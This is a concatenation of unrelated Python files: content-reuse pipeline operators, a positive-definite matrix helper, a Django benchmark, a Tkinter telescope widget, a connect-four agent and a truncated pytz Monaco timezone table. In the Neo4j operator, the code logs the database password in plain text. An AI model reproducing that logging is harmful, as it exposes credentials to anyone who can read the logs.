toc_df[['Chapter Name', 'Topic Name']] = toc_df[['Chapter Name', 'Topic Name']].apply(
lambda x: preprocess.strip_word_number(x, " "))
toc_df = pd.DataFrame(toc_df.groupby('Chapter Name')['Topic Name'].unique())
pred_df = pd.DataFrame()
pred_df['title'] = [dtb_predicted['alignment'][i]['source']['fulltext_annotation'] for i in
range(len(dtb_predicted['alignment']))]
pred_df['pred_text'] = [dtb_predicted['alignment'][i]['target']['fulltext_annotation'] for i in
range(len(dtb_predicted['alignment']))]
pred_df[['title', 'pred_text']] = pred_df[['title', 'pred_text']].apply(
lambda x: preprocess.strip_word_number(x, " "))
dtb_actual[['CONTENTS', 'Toc feature']] = dtb_actual[['CONTENTS', 'Toc feature']].apply(
lambda x: preprocess.strip_word_number(x, " "))
actual_predict_df_ls = agg_actual_predict_df(toc_df, dtb_actual, pred_df, level)
concat_df = pd.concat(actual_predict_df_ls)
concat_df = concat_df.reset_index()
concat_df['Actual_text_split'] = [set(i.split()) for i in concat_df['ActualText']]
concat_df['Pred_text_split'] = [set(i.split()) for i in concat_df['PredictedText']]
concat_df['Common_words'] = [set(concat_df['Actual_text_split'][i]) & set(concat_df['Pred_text_split'][i])
for i in range(len(concat_df))]
concat_df['Len_actual_text_split'] = [float(len(i)) for i in list(concat_df['Actual_text_split'])]
concat_df['Len_pred_text_split'] = [float(len(i)) for i in list(concat_df['Pred_text_split'])]
concat_df['Len_common_words'] = [float(len(i)) for i in list(concat_df['Common_words'])]
concat_df['Intersection/actu'] = calc_stat(list(concat_df['Common_words']),
list(concat_df['Actual_text_split']), "division")
concat_df['Intersection/pred'] = calc_stat(list(concat_df['Common_words']),
list(concat_df['Pred_text_split']), "division")
concat_df['WordlistEMD'] = calc_stat(list(concat_df['Actual_text_split']),
list(concat_df['Pred_text_split']), "MED")
concat_df.to_csv(output_loc, index=False)
self.outputs["path_to_dtb_evaluation_result"].write(output_loc)
else:
print("The column is not present in the Dataframe!!")
class DTBMapping(BaseOperator):
@property
def inputs(self):
"""
Function that the DTBMapping operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_reference_DTB: path to reference DTB
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"path_to_dtb_json_file": File_IO(self.node.inputs[1]),
"path_to_reference_DTB": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the DTBMapping operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_mapping_json": File_IO(
self.node.outputs[0])}
def run(self, no_of_recommendations, distance_method):
path_to_result_folder = self.inputs["path_to_result_folder"].read()
path_to_dtb_json_file = self.inputs["path_to_dtb_json_file"].read()
path_to_ref_dtb = self.inputs["path_to_reference_DTB"].read()
path_to_mapping_json = os.path.join(path_to_result_folder, distance_method + "_mapping.json")
state_DTB = getDTB(path_to_dtb_json_file)
reference_DTB = pd.DataFrame()
for TB in os.listdir(path_to_ref_dtb):
try:
DTB_df = getDTB(os.path.join(path_to_ref_dtb, TB, "DTB.json"))
DTB_df["textbook"] = TB
reference_DTB = reference_DTB.append(DTB_df)
except:
pass
reference_DTB = reference_DTB.reset_index()
if distance_method == "BERT":
distance = dist.getDistance(list(state_DTB['text']), list(reference_DTB['text']), 'BERT')
elif distance_method == "WMD":
distance = dist.getDistance(list(state_DTB['text']), list(reference_DTB['text']), 'WMD')
else:
print("Invalid distance measure!!")
try:
distance_df = pd.DataFrame(distance, index=list(state_DTB['identifier']),
columns=list(reference_DTB['identifier']))
topN_similar = getSimilarTopic(distance_df, no_of_recommendations)
json.dump(topN_similar, open(path_to_mapping_json, "w"), indent=4)
self.outputs["path_to_mapping_json"].write(path_to_mapping_json)
except:
print("Distance not computed")
class DataPreparation(BaseOperator):
@property
def inputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_base_data_file: path to base data file
"""
return {
"path_to_base_data": File_IO(self.node.inputs[0]),
"path_to_result_folder": File_IO(self.node.inputs[1])
}
@property
def outputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph outputs
:return: Returns the path to the cosine similarity pickle and complete data set
"""
return {
"path_to_cosine_similarity_matrix": File_IO(self.node.outputs[0]),
"path_to_complete_data_set": File_IO(self.node.outputs[1])
}
def run(self, sentence_length, cosine_score_threshold):
"""
Generate data for the purpose of scoring
:param sentence_length: filter data on minimum number of sentences per topic
:param cosine_score_threshold: threshold to filter cosine similarity score on
:return: None
"""
path_to_base_data = self.inputs["path_to_base_data"].read()
path_to_result_folder = self.inputs["path_to_result_folder"].read()
node_name = 'data_preparation'
path_to_result_folder = os.path.join(path_to_result_folder, node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
if not os.path.exists(path_to_base_data):
raise Exception("Base data file not present.")
try:
base_df = pd.read_csv(path_to_base_data)[
['STB_Id', 'STB_Grade', 'STB_Section', 'STB_Text', 'Ref_id', 'Ref_Grade', 'Ref_Section', 'Ref_Text']]
except FileNotFoundError:
raise Exception("Base data file does not exist")
except KeyError:
raise Exception("Column names are invalid")
stb_df = base_df[['STB_Id', 'STB_Grade', 'STB_Section', 'STB_Text', 'Ref_id']]
stb_df.columns = ['identifier', 'grade', 'section', 'text', 'identifier_ref_']
stb_df['text'] = stb_df['text'].apply(listify)
stb_df.dropna(axis=0, subset=['text'], inplace=True)
ref_df = base_df[['Ref_id', 'Ref_Grade', 'Ref_Section', 'Ref_Text']]
ref_df.columns = ['identifier', 'grade', 'section', 'text']
ref_df['text'] = ref_df['text'].apply(listify)
ref_df.dropna(axis=0, subset=['text'], inplace=True)
stb_df = modify_df(stb_df, sentence_length)
ref_df = modify_df(ref_df, sentence_length)
cos_sim_df = generate_cosine_similarity_score(stb_df, ref_df, path_to_result_folder)
append_cosine_similarity_score(stb_df, ref_df, cos_sim_df, path_to_result_folder, cosine_score_threshold)
self.outputs["path_to_cosine_similarity_matrix"].write(os.path.join(path_to_result_folder,
'cosine_similarity.pkl'))
self.outputs["path_to_complete_data_set"].write(os.path.join(path_to_result_folder, 'complete_data_set.csv'))
class DataPreparationV2(BaseOperator):
@property
def inputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_base_data_file: path to base data file
"""
return {
"path_to_stb_data": File_IO(self.node.inputs[0]),
"path_to_ref_data": File_IO(self.node.inputs[1]),
"path_to_result_folder": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph outputs
:return: Returns the path to the cosine similarity pickle and complete data set
"""
return {
"path_to_cosine_similarity_matrix": File_IO(self.node.outputs[0]),
"path_to_complete_data_set": File_IO(self.node.outputs[1])
}
def run(self, sentence_length, cosine_score_threshold):
"""
Generate data for the purpose of scoring
:param sentence_length: filter data on minimum number of sentences per topic
:param cosine_score_threshold: threshold to filter cosine similarity score on
:return: None
"""
path_to_stb_data = self.inputs["path_to_stb_data"].read()
path_to_ref_data = self.inputs["path_to_ref_data"].read()
path_to_result_folder = self.inputs["path_to_result_folder"].read()
node_name = 'data_preparation'
path_to_result_folder = os.path.join(path_to_result_folder, node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
assert os.path.exists(path_to_stb_data)
assert os.path.exists(path_to_ref_data)
try:
stb_df = pd.read_csv(path_to_stb_data)[['Identifier', 'topic_text']]
stb_df = stb_df.dropna()
stb_df.columns = ['identifier', 'text']
stb_df['text'] = stb_df['text'].apply(lambda x: x.replace('\n', ' ').split('. '))
ref_df = pd.read_csv(path_to_ref_data)[
['Concept id', 'Type of match', 'fulltext_annotation_target']].fillna(
{'fulltext_annotation_target': ''})
ref_df = ref_df[ref_df['Type of match'] == 'Complete']
ref_df.drop('Type of match', axis=1, inplace=True)
ref_df = ref_df.groupby('Concept id')['fulltext_annotation_target'].apply(
lambda x: '. '.join(x)).reset_index()
ref_df.columns = ['identifier', 'text']
ref_df['text'] = ref_df['text'].apply(lambda x: x.replace('\n', ' ').split('. '))
ref_df = ref_df[ref_df['text'] != '']
except FileNotFoundError:
raise Exception("Base data file does not exist")
except KeyError:
raise Exception("Column names are invalid")
stb_df = modify_df(stb_df, sentence_length)
ref_df = modify_df(ref_df, sentence_length)
cos_sim_df = generate_cosine_similarity_score(stb_df, ref_df, path_to_result_folder)
append_cosine_similarity_score(stb_df, ref_df, cos_sim_df, path_to_result_folder, cosine_score_threshold)
self.outputs["path_to_cosine_similarity_matrix"].write(os.path.join(path_to_result_folder,
'cosine_similarity.pkl'))
self.outputs["path_to_complete_data_set"].write(os.path.join(path_to_result_folder, 'complete_data_set.csv'))
class BertScoring(BaseOperator):
@property
def inputs(self):
"""
Function that the BERTScoring operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_reference_DTB: path to reference DTB
"""
return {
"path_to_scoring_data": File_IO(self.node.inputs[0]),
"path_to_trained_model": ReadDaggitTask_Folderpath(self.node.inputs[1]),
"path_to_pickled_tokenizer": File_IO(self.node.inputs[2]),
"path_to_siamese_config": File_IO(self.node.inputs[3])
}
@property
def outputs(self):
"""
Function that the BERTScoring operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_predicted_output": File_Txt(
self.node.outputs[0])}
def run(self, filter_by_type_of_match, filter_by_grade_range_, threshold, embedding_method):
path_to_scoring_data = self.inputs["path_to_scoring_data"].read()
node_name = 'bert_scoring'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_scoring_data)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
path_to_best_model = self.inputs["path_to_trained_model"].read_loc()
path_to_pickled_tokenizer = self.inputs["path_to_pickled_tokenizer"].read()
path_to_siamese_config = self.inputs["path_to_siamese_config"].read()
test_df = pd.read_csv(path_to_scoring_data)
test_df.fillna({'sentence1': '', 'sentence2': ''}, inplace=True)
if "Unnamed: 0" in test_df.columns:
del test_df["Unnamed: 0"]
# filtering the test dataset based on grade range: +2/-2
if filter_by_grade_range_ != "nan":
grade_range = 2
test_df = filter_by_grade_range(test_df, grade_range)
# filtering based on type of match
if filter_by_type_of_match != "nan":
test_df = test_df[test_df["type_of_match"] == filter_by_type_of_match].copy()
test_df = test_df.reset_index(drop=True)
# if model not present terminate the process:
assert os.path.exists(path_to_result_folder)
assert os.path.exists(path_to_best_model)
assert os.path.exists(path_to_pickled_tokenizer)
# loading tokenizer:
with open(path_to_pickled_tokenizer, 'rb') as tokenizer_file:
tokenizer = pickle.load(tokenizer_file)
with open(path_to_siamese_config, "rb") as json_file:
siamese_config = json.load(json_file)
# invoke the scoring module:
output_pred_df = scoring_module(tokenizer, path_to_best_model, siamese_config, test_df, threshold)
path_to_save_output = os.path.join(path_to_result_folder, "output_{0}.csv").format(embedding_method)
output_pred_df.to_csv(path_to_save_output, index=False)
self.outputs["path_to_predicted_output"].write(path_to_save_output)
class TopicLevelAggregation(BaseOperator):
@property
def inputs(self):
"""
Function that the TopicLevelAggregation operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_predicted_output: path to the output csv with predicted score
"""
return {
"path_to_predicted_output": File_Txt(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the TopicLevelAggregation operator defines while returning graph outputs
:returns: Returns the path to the csv with aggregated score for each topic pair
path_to_output_topic_agg: path to the csv with aggregated score for each topic pair
"""
return {"path_to_output_topic_agg": File_IO(
self.node.outputs[0])}
def run(self, aggregation_criteria, compute_topic_similarity, mandatory_column_names, data_labeled):
path_to_predicted_output = self.inputs["path_to_predicted_output"].read()
node_name = 'topic_level_aggregation'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_predicted_output)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
assert os.path.exists(path_to_predicted_output)
output_pred_df = pd.read_csv(path_to_predicted_output)
if "Unnamed: 0" in output_pred_df.columns:
del output_pred_df["Unnamed: 0"]
# Topic similarity aggregation computation:
if compute_topic_similarity:
path_to_save_output = os.path.join(path_to_result_folder, "agg_topic_level_output.csv")
output_aggregated_topic_level = aggregation_topic_level(output_pred_df, aggregation_criteria,
mandatory_column_names, data_labeled)
output_aggregated_topic_level.to_csv(path_to_save_output)
else:
path_to_save_output = path_to_predicted_output
self.outputs["path_to_output_topic_agg"].write(path_to_save_output)
class ContentReuseEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_full_score_metrics_file: path to scored dataframe file
"""
return {
"path_to_output_topic_agg": File_IO(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph outputs
:return: Returns the path to the k_eval_metrics
"""
return {
"path_to_k_eval_metrics": File_IO(self.node.outputs[0])
}
def run(self, window):
"""
Generate k evaluation metrics
:param window: length of k eval metrics window
:return: None
"""
path_to_output_topic_agg = self.inputs["path_to_output_topic_agg"].read()
node_name = 'evaluation'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_output_topic_agg)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
full_score_df = pd.read_csv(path_to_output_topic_agg)
k_result_df = k_topic_recommendation(full_score_df, window)
k_1 = k_result_df["k=1"].mean()
k_2 = k_result_df["k=2"].mean()
k_3 = k_result_df["k=3"].mean()
k_4 = k_result_df["k=4"].mean()
k_5 = k_result_df["k=5"].mean()
eval_dict = {"k=1": k_1, "k=2": k_2, "k=3": k_3, "k=4": k_4, "k=5": k_5}
with open(os.path.join(path_to_result_folder, 'k_eval_metrics.json'), 'w') as f:
json.dump(eval_dict, f)
self.outputs["path_to_k_eval_metrics"].write(os.path.join(path_to_result_folder, 'k_eval_metrics.json'))
class RecommendKConceptsPerTopic(BaseOperator):
@property
def inputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_full_score_metrics_file: path to scored dataframe file
"""
return {
"path_to_output_topic_agg": File_IO(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph outputs
:return: Returns the path to the k_eval_metrics
"""
return {
"path_to_dtb_mapping_file": File_IO(self.node.outputs[0])
}
def run(self, window):
"""
Generate k evaluation metrics
:param window: length of k eval metrics window
:return: None
"""
path_to_output_topic_agg = self.inputs["path_to_output_topic_agg"].read()
node_name = 'recommend_k_concepts_per_topic'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_output_topic_agg)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
df = pd.read_csv(path_to_output_topic_agg)[['stb_id', 'ref_id', 'pred_score_mean']]
df.sort_values(['stb_id', 'pred_score_mean'], ascending=False, inplace=True)
output = {}
for id_ in df.stb_id.unique():
temp = df[df['stb_id'] == id_].head(window).set_index('ref_id').drop('stb_id', axis=1)
output[id_] = [{ind: row['pred_score_mean']} for ind, row in temp.iterrows()]
with open(os.path.join(path_to_result_folder, 'dtb_mapping.json'), 'w') as f:
json.dump(output, f)
self.outputs["path_to_dtb_mapping_file"].write(os.path.join(path_to_result_folder, 'dtb_mapping.json'))
class WriteRelationshipsToNeo4j(BaseOperator):
@property
def inputs(self):
"""
Function that the WriteRelationshipsToNeo4j operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_configuration_file: path to configuration file
path_to_dtb_mapping_file: path to dtb mapping file
"""
return {
"path_to_configuration_file": File_IO(self.node.inputs[0]),
"path_to_dtb_mapping_file": File_IO(self.node.inputs[1])
}
@property
def outputs(self):
"""
Function that the WriteRelationshipsToNeo4j operator defines while returning graph outputs
:return: Outputs to the node of the Content Reuse graph
"""
return None
def run(self):
"""
Create a connection to Graph DB and ingest DTB Mapping relations to it
"""
path_to_credentials = self.inputs["path_to_configuration_file"].read()
path_to_dtb_mapping = self.inputs["path_to_dtb_mapping_file"].read()
config = configparser.ConfigParser(allow_no_value=True)
config.read(path_to_credentials)
try:
scheme = ast.literal_eval(config["graph"]["scheme"])
host = ast.literal_eval(config["graph"]["host"])
port = ast.literal_eval(config["graph"]["port"])
user = ast.literal_eval(config["graph"]["user"])
password = ast.literal_eval(config["graph"]["password"])
max_connections = ast.literal_eval(config["graph"]["max_connections"])
secure = ast.literal_eval(config["graph"]["secure"])
start_node_label = ast.literal_eval(config["relationship"]["start_node_label"])
end_node_label = ast.literal_eval(config["relationship"]["end_node_label"])
relationship_label = ast.literal_eval(config["relationship"]["relationship_label"])
relationship_properties = ast.literal_eval(config["relationship"]["relationship_properties"])
logging.info(str([scheme, host, port, user, password, max_connections, secure, start_node_label,
end_node_label, relationship_label, relationship_properties]))
graph = connect_to_graph(scheme, host, port, user, password, max_connections, secure)
with open(path_to_dtb_mapping, 'r') as f:
dtb_mapping = json.load(f)
create_node_relationships(graph, dtb_mapping, start_node_label, end_node_label, relationship_label,
relationship_properties)
        except KeyError as ke:
            logging.error("Key Error found: %s", ke)
|
"""
A small module to find the nearest positive definite matrix.
"""
# Copyright (c) Andrew R. McCluskey and Benjamin J. Morgan
# Distributed under the terms of the MIT License
# author: Andrew R. McCluskey (arm61)
import warnings
import numpy as np
def find_nearest_positive_definite(matrix: np.ndarray) -> np.ndarray:
"""
Find the nearest positive-definite matrix to that given, using the method from N.J. Higham, "Computing a nearest
symmetric positive semidefinite matrix" (1988): 10.1016/0024-3795(88)90223-6
:param matrix: Matrix to find nearest positive-definite for.
:return: Nearest positive-definite matrix.
"""
if check_positive_definite(matrix):
return matrix
warnings.warn("The estimated covariance matrix was not positive definite, the nearest positive "
"definite matrix has been found and will be used.")
B = (matrix + matrix.T) / 2
_, s, V = np.linalg.svd(B)
H = np.dot(V.T, np.dot(np.diag(s), V))
A2 = (B + H) / 2
A3 = (A2 + A2.T) / 2
if check_positive_definite(A3):
return A3
spacing = np.spacing(np.linalg.norm(matrix))
eye = np.eye(matrix.shape[0])
k = 1
while not check_positive_definite(A3):
mineig = np.min(np.real(np.linalg.eigvals(A3)))
A3 += eye * (-mineig * k**2 + spacing)
k += 1
return A3
def check_positive_definite(matrix: np.ndarray) -> bool:
"""
Checks if a matrix is positive-definite via Cholesky decomposition.
:param matrix: Matrix to check.
:return: True for a positive-definite matrix.
"""
try:
_ = np.linalg.cholesky(matrix)
return True
except np.linalg.LinAlgError:
return False
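# Small illustrative check added for orientation: the matrix below is symmetric but not
# positive definite (its determinant is slightly negative), so the repair path is exercised.
if __name__ == "__main__":
    cov = np.array([[1.0, 0.9, 0.7],
                    [0.9, 1.0, 0.3],
                    [0.7, 0.3, 1.0]])
    repaired = find_nearest_positive_definite(cov)
    print(check_positive_definite(cov), check_positive_definite(repaired))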
|
from time import time
from tables.check.base import CheckBase
from tables.models import SimpleTable
class CheckBulkUpdate(CheckBase):
name = 'bulk_update'
graph_title = 'Bulk update'
def check_rows(self, rows):
SimpleTable.objects.all().delete()
values = (SimpleTable(name='testname') for _ in range(rows))
SimpleTable.objects.bulk_create(values)
start_time = time()
SimpleTable.objects.all().update(name='newname')
time_taken = time() - start_time
return time_taken
|
#!/usr/bin/env python
"""Displays coordinate system, object net position,
and rotation type and angle.
History:
2003-03-26 ROwen Modified to use the tcc model.
2003-03-31 ROwen Switched from RO.Wdg.LabelledWdg to RO.Wdg.Gridder
2003-05-28 ROwen Modified to use RO.CoordSys.
2003-06-09 ROwen    Removed dispatcher arg.
2003-06-11 ROwen Modified to use new tccModel objSys.
2003-06-12 ROwen Added helpText entries.
2003-06-18 ROwen Bug fix: pos1 not shown in hours when wanted (introduced 2003-06-11).
2003-06-19 ROwen Improved helpText for coordinate system, rotator angle and rotator position.
2003-06-25 ROwen Modified test case to handle message data as a dict
2003-12-03 ROwen Made object name longer (to match slew input widget).
2004-02-04 ROwen Modified _HelpURL to match minor help reorg.
2009-03-31 ROwen Updated for new TCC model.
2009-07-19 ROwen Modified to work with new KeyVar and the way it handles PVTs.
2010-03-12 ROwen Changed to use Models.getModel.
2010-03-19 ROwen Simplified help URLs to all point to the same section.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import Tkinter
import RO.CnvUtil
import RO.CoordSys
import RO.StringUtil
import RO.Wdg
import TUI.Models
_HelpURL = "Telescope/StatusWin.html#NetPos"
_CoordSysHelpDict = {
RO.CoordSys.ICRS: u"ICRS mean RA/Dec: the current standard (\N{ALMOST EQUAL TO}FK5 J2000)",
RO.CoordSys.FK5: "FK5 mean RA/Dec: the IAU 1976 standard",
RO.CoordSys.FK4: "FK4 mean RA/Dec: an old standard",
RO.CoordSys.Galactic: "Galactic long/lat: the IAU 1958 standard",
RO.CoordSys.Geocentric: "Current apparent geocentric RA/Dec",
RO.CoordSys.Topocentric: "Current apparent topocentric az/alt; no refraction corr.",
RO.CoordSys.Observed: "Observed az/alt: topocentric plus refraction correction",
RO.CoordSys.Physical: "Physical az/alt; pos. of a perfect telescope",
RO.CoordSys.Mount: "Mount az/alt: pos. sent to the axis controllers; no wrap",
}
_RotTypeHelpDict = {
"object": "Rotating with the object",
"horizon": "Rotating with the horizon",
"mount": "Rotating with respect to the rotator mount",
"none": "Rotator left where it is",
}
_RotPosHelpDict = {
"object": "Angle of object with respect to the instrument",
"horizon": "Angle of az/alt with respect to the instrument",
"mount": "Angle sent to the rotator controller",
}
class NetPosWdg (Tkinter.Frame):
def __init__ (self, master=None, **kargs):
"""creates a new telescope position position frame
Inputs:
- master master Tk widget -- typically a frame or window
"""
Tkinter.Frame.__init__(self, master, **kargs)
self.tccModel = TUI.Models.getModel("tcc")
gr = RO.Wdg.Gridder(self, sticky="w")
# object name
# self.objNameWdg = RO.Wdg.StrLabel(
# master = self,
# width = 25,
# anchor = "w",
# helpText = "Object name",
# helpURL = _HelpURL,
# )
# gr.gridWdg (
# label = "Name",
# dataWdg = self.objNameWdg,
# colSpan = 3,
# )
# self.tccModel.objName.addValueCallback(self.objNameWdg.set)
# object net position
self.netPos1Wdg = gr.gridWdg(
label = "",
dataWdg = RO.Wdg.DMSLabel(
master = self,
precision = 2,
width = 13,
helpText = "Net object position, including object offset",
helpURL = _HelpURL,
),
units = "",
)
self.netPos2Wdg = gr.gridWdg (
label = "",
dataWdg = RO.Wdg.DMSLabel(
master = self,
precision = 2,
width = 13,
helpText = "Net object position, including object offset",
helpURL = _HelpURL,
),
units = RO.StringUtil.DMSStr,
)
self.tccModel.objNetPos.addValueListCallback((self.netPos1Wdg.dataWdg.set, self.netPos2Wdg.dataWdg.set),
cnvFunc=RO.CnvUtil.posFromPVT)
# coordinate system
self.csysWdg = RO.Wdg.StrLabel(
master = self,
width = 13,
anchor = "w",
helpText = "Object coordinate system",
helpURL = _HelpURL,
)
gr.gridWdg (
label = "CSys",
dataWdg = self.csysWdg,
colSpan = 2
)
self.tccModel.objSys.addCallback(self._objSysCallback)
# rotation angle and type
# rotFrame = Tkinter.Frame(self)
# self.rotPosWdg = RO.Wdg.FloatLabel(
# master = rotFrame,
# precision = 2,
# width = 8,
# helpText = "Rotator angle (see full help for more info)",
# helpURL = _HelpURL,
# )
# self.rotPosWdg.pack(side="left")
# rotUnitsLabel = Tkinter.Label(rotFrame, text=RO.StringUtil.DegStr)
# rotUnitsLabel.pack(side="left")
# self.rotTypeWdg = RO.Wdg.StrLabel(
# master = rotFrame,
# width = 8,
# anchor = "w",
# helpURL = _HelpURL,
# )
# self.rotTypeWdg.pack(side="left")
# gr.gridWdg (
# label = "Rot",
# dataWdg = rotFrame,
# colSpan = 2,
# )
# self.tccModel.rotType.addValueCallback(self.rotTypeWdg.set)
# self.tccModel.rotType.addCallback(self._rotTypeCallback)
# self.tccModel.rotPos.addValueCallback(self.rotPosWdg.set, cnvFunc=RO.CnvUtil.posFromPVT)
# allow the last column to grow to fill the available space
# self.columnconfigure(3, weight=1)
def _objSysCallback(self, keyVar):
"""sets the coordinate system
"""
# print "TUI.TCC.StatusWdg.NetPosWdg._objSysCallback%r" % ((csysObjAndDate, isCurrent),)
isCurrent = keyVar.isCurrent
csysObj = self.tccModel.csysObj
csysDate = keyVar[1]
csysValid = str(csysObj).lower() != "unknown"
dateValid = csysDate is not None
if not csysValid:
self.setNoCoordSys()
return
if csysObj.dateIsYears():
if not dateValid:
csysStr = "%s ?EPOCH?" % (csysObj,)
elif csysDate != 0.0 or csysObj.hasEquinox():
csysStr = "%s %s%.1f" % (csysObj, csysObj.datePrefix(), csysDate)
else:
csysStr = str(csysObj)
elif csysObj.dateIsSidTime():
# typically the default date (<0 => now) is used
# but local apparent sidereal time may be specified
if not dateValid:
csysStr = "%s ?ST?" % (csysObj,)
elif csysDate < 0.0:
csysStr = str(csysObj)
else:
dateHMS = RO.StringUtil.dmsStrFromDeg(csysDate, precision=0)
csysStr = "%s %s hms" % (csysObj, dateHMS)
else:
# no date
csysStr = str(csysObj)
self.csysWdg.set(csysStr, isCurrent=isCurrent)
posLabels = csysObj.posLabels()
self.netPos1Wdg.labelWdg["text"] = posLabels[0]
self.netPos2Wdg.labelWdg["text"] = posLabels[1]
self.setPos1InHrs(csysObj.eqInHours())
self.csysWdg.helpText = _CoordSysHelpDict.get(csysObj.name(), "Coordinate system")
def _rotTypeCallback(self, keyVar):
rotType = keyVar[0]
if rotType:
rotType = rotType.lower()
self.rotTypeWdg.helpText = _RotTypeHelpDict.get(rotType, "Type of rotation")
self.rotPosWdg.helpText = _RotPosHelpDict.get(rotType, "Angle of rotation")
def setNoCoordSys(self):
"""Call if coordinate system invalid or unknown"""
self.csysWdg.set(None, isCurrent = False)
self.netPos1Wdg.labelWdg["text"] = "RA"
self.netPos2Wdg.labelWdg["text"] = "Dec"
self.setPos1InHrs(True)
def setPos1InHrs(self, pos1InHrs):
if pos1InHrs:
self.netPos1Wdg.dataWdg.setCvtDegToHrs(True)
self.netPos1Wdg.unitsWdg["text"] = "hms"
else:
self.netPos1Wdg.dataWdg.setCvtDegToHrs(None)
self.netPos1Wdg.unitsWdg["text"] = RO.StringUtil.DMSStr
if __name__ == "__main__":
import TestData
tuiModel = TestData.tuiModel
testFrame = NetPosWdg(tuiModel.tkRoot)
testFrame.pack()
dataList = (
"ObjName='test object with a long name'",
"ObjSys=ICRS, 0",
"ObjNetPos=120.123450, 0.000000, 4494436859.66000, -2.345670, 0.000000, 4494436859.66000",
"RotType=Obj",
"RotPos=3.456789, 0.000000, 4494436895.07921",
)
TestData.testDispatcher.dispatch(dataList)
tuiModel.reactor.run()
|
from connect_four.agents.agent import Agent
class Human(Agent):
def action(self, env, last_action=None):
return int(input("requesting action: "))
|
'''tzinfo timezone information for Europe/Monaco.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Monaco(DstTzInfo):
'''Europe/Monaco timezone definition. See datetime.tzinfo for details'''
zone = 'Europe/Monaco'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1911,3,10,23,50,39),
d(1916,6,14,23,0,0),
d(1916,10,1,23,0,0),
d(1917,3,24,23,0,0),
d(1917,10,7,23,0,0),
d(1918,3,9,23,0,0),
d(1918,10,6,23,0,0),
d(1919,3,1,23,0,0),
d(1919,10,5,23,0,0),
d(1920,2,14,23,0,0),
d(1920,10,23,23,0,0),
d(1921,3,14,23,0,0),
d(1921,10,25,23,0,0),
d(1922,3,25,23,0,0),
d(1922,10,7,23,0,0),
d(1923,5,26,23,0,0),
d(1923,10,6,23,0,0),
d(1924,3,29,23,0,0),
d(1924,10,4,23,0,0),
d(1925,4,4,23,0,0),
d(1925,10,3,23,0,0),
d(1926,4,17,23,0,0),
d(1926,10,2,23,0,0),
d(1927,4,9,23,0,0),
d(1927,10,1,23,0,0),
d(1928,4,14,23,0,0),
d(1928,10,6,23,0,0),
d(1929,4,20,23,0,0),
d(1929,10,5,23,0,0),
d(1930,4,12,23,0,0),
d(1930,10,4,23,0,0),
d(1931,4,18,23,0,0),
d(1931,10,3,23,0,0),
d(1932,4,2,23,0,0),
d(1932,10,1,23,0,0),
d(1933,3,25,23,0,0),
d(1933,10,7,23,0,0),
d(1934,4,7,23,0,0),
d(1934,10,6,23,0,0),
d(1935,3,30,23,0,0),
d(1935,10,5,23,0,0),
d(1936,4,18,23,0,0),
d(1936,10,3,23,0,0),
d(1937,4,3,23,0,0),
d(1937,10,2,23,0,0),
d(1938,3,26,23,0,0),
d(1938,10,1,23,0,0),
d(1939,4,15,23,0,0),
d(1939,11,18,23,0,0),
d(1940,2,25,2,0,0),
d(1941,5,4,23,0,0),
d(1941,10,5,22,0,0),
d(1942,3,8,23,0,0),
d(1942,11,2,1,0,0),
d(1943,3,29,1,0,0),
d(1943,10,4,1,0,0),
d(1944,4,3,1,0,0),
d(1944,10,7,23,0,0),
d(1945,4,2,1,0,0),
d(1945,9,16,1,0,0),
d(1976,3,28,0,0,0),
d(1976,9,25,23,0,0),
d(1977,4,3,1,0,0),
d(1977,9,25,1,0,0),
d(1978,4,2,1,0,0),
d(1978,10,1,1,0,0),
d(1979,4,1,1,0,0),
d(1979,9,30,1,0,0),
d(1980,4,6,1,0,0),
d(1980,9,28,1,0,0),
d(1981,3,29,1,0,0),
d(1981,9,27,1,0,0),
d(1982,3,28,1,0,0),
d(1982,9,26,1,0,0),
d(1983,3,27,1,0,0),
d(1983,9,25,1,0,0),
d(1984,3,25,1,0,0),
d(1984,9,30,1,0,0),
d(1985,3,31,1,0,0),
d(1985,9,29,1,0,0),
d(1986,3,30,1,0,0),
d(1986,9,28,1,0,0),
d(1987,3,29,1,0,0),
d(1987,9,27,1,0,0),
d(1988,3,27,1,0,0),
